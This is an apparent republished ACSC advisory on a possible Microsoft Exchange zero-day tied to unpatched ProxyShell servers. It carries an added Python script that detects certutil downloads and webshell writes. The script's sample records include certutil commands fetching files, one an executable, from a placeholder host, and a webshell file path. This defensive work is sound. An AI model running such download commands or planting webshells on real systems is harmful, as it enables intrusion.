Potential vulnerability associated with Microsoft Exchange

Australian Cyber Security Centre

Background / What has happened?

The Australian Cyber Security Centre (ACSC) is aware of a potential vulnerability associated with Microsoft Exchange Server (Exchange).

The ACSC is not aware of successful exploitation within Australia.

Exchange servers that have not been patched against the ProxyShell vulnerabilities are reportedly impacted by the potential zero-day vulnerability.

There is no associated CVE at this time.

Historical CVEs related to ProxyShell:

  • CVE-2021-34473 - Pre-auth path confusion leading to ACL bypass (patched in April 2021 by KB5001779)
  • CVE-2021-34523 - Elevation of privilege on the Exchange PowerShell backend (patched in April 2021 by KB5001779)
  • CVE-2021-31207 - Post-auth arbitrary file write leading to RCE (patched in May 2021 by KB5003435)

These CVE identifiers were published in July 2021, after the April and May 2021 security updates that fixed them, so an Exchange server at the May 2021 security update level or later is already covered against the original ProxyShell chain.

Mitigation / How do I stay secure?

Apply the latest patches from Microsoft and monitor the network for suspicious activity.

Monitor Exchange servers for webshells.

Monitor for suspicious use of certutil (e.g. certutil.exe -urlcache -split -f). Note that certutil accepts both '-' and '/' as switch prefixes and is not case sensitive, so a detection keyed on the exact string "-urlcache" will miss trivially varied command lines.
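As a worked illustration of the two monitoring points above (webshells on Exchange servers and certutil download activity), here is a small Python detection run over constructed process-creation and file-creation records. It is an added example, not part of the ACSC advisory: the key=value record layout, the Exchange web-root path fragments and the script extensions are assumptions to tune against your own telemetry (Sysmon, EDR, or 4688 command-line auditing). It flags certutil invoked with the urlcache switch plus a URL argument, accepting both the '-' and '/' switch prefixes in any case, and flags new ASP.NET script files written under Exchange's IIS-served directories.

```python
"""Toy detections for two ACSC mitigations: certutil.exe downloads and
new script files under Exchange web roots.

Added example, not part of the ACSC advisory. The record format is a
constructed, simplified key=value layout loosely modelled on Sysmon
Event ID 1 (process create) and Event ID 11 (file create). The web-root
fragments and extensions below are assumptions to tune locally.
"""
import ntpath
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample records (not real telemetry). Values with spaces are quoted.
SAMPLE_EVENTS = [
    r'id=1 image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Windows\Temp\a.txt"',
    r'id=1 image="C:\Windows\System32\certutil.exe" cmdline="CertUtil /urlcache /f http://203.0.113.5/b.exe b.exe"',
    r'id=1 image="C:\Windows\System32\certutil.exe" cmdline="certutil -verify -urlfetch cert.cer"',
    r'id=1 image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -store My"',
    r'id=11 image="C:\Windows\System32\inetsrv\w3wp.exe" target="C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\shell.aspx"',
    r'id=11 image="C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeTransport.exe" target="C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\Logs\queue.log"',
]

# key=value tokens; a quoted value may contain spaces.
TOKEN = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Command-line tokens: a quoted run or a bare run of non-whitespace.
ARG = re.compile(r'"[^"]*"|\S+')
URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Assumed directory fragments (lower-cased) that Exchange serves through IIS.
EXCHANGE_WEB_ROOTS = (
    "\\frontend\\httpproxy\\",
    "\\clientaccess\\",
    "\\inetpub\\wwwroot\\aspnet_client\\",
)
# Assumed server-side script extensions a webshell would use.
WEBSHELL_EXTS = (".aspx", ".asp", ".ashx", ".asmx")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value record into a dict."""
    return {key: quoted or bare for key, quoted, bare in TOKEN.findall(line)}


def is_certutil_download(cmdline: str) -> bool:
    """True when certutil is run with the urlcache switch and a URL argument.

    Switches may use '-' or '/' and any letter case. A '-urlcache' call
    without a URL (listing the cache) or unrelated switches such as
    '-verify -urlfetch' do not match.
    """
    argv = [tok.strip('"') for tok in ARG.findall(cmdline)]
    if not argv or ntpath.basename(argv[0]).lower() not in ("certutil", "certutil.exe"):
        return False
    switches = {a[1:].lower() for a in argv[1:] if len(a) > 1 and a[0] in "-/"}
    has_url = any(URL.match(a) for a in argv[1:])
    return "urlcache" in switches and has_url


def is_suspicious_web_file(target: str) -> bool:
    """True when a server-side script file is created under an Exchange web root."""
    path = target.lower()
    return any(root in path for root in EXCHANGE_WEB_ROOTS) and path.endswith(WEBSHELL_EXTS)


def scan(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (detection_name, detail) pairs for every record that matches."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("id") == "1" and is_certutil_download(ev.get("cmdline", "")):
            hits.append(("certutil_download", ev["cmdline"]))
        elif ev.get("id") == "11" and is_suspicious_web_file(ev.get("target", "")):
            hits.append(("webshell_write", f"{ev['target']} written by {ev.get('image', '?')}"))
    return hits


if __name__ == "__main__":
    for name, detail in scan(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The two certutil hits in the sample differ only in switch prefix and letter case, which is the variation a string-match rule on "-urlcache" would miss; the webshell check keys on where the file lands and what it is, not on the writing process, although an .aspx written by w3wp.exe (as in the sample) deserves immediate attention.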

Microsoft has been notified and the ACSC will provide updates as they become available.

Assistance / Where can I go for help?

The ACSC is monitoring the situation and is able to provide assistance and advice as required. Organisations or individuals that have been impacted or require assistance can contact the ACSC via cyber.gov.au/report, or 1300 CYBER1.

Public Release. This material from the originating organization/author(s) might be of the point-in-time nature, and edited for clarity, style and length. Mirage.News does not take institutional positions or sides, and all views, positions, and conclusions expressed herein are solely those of the author(s).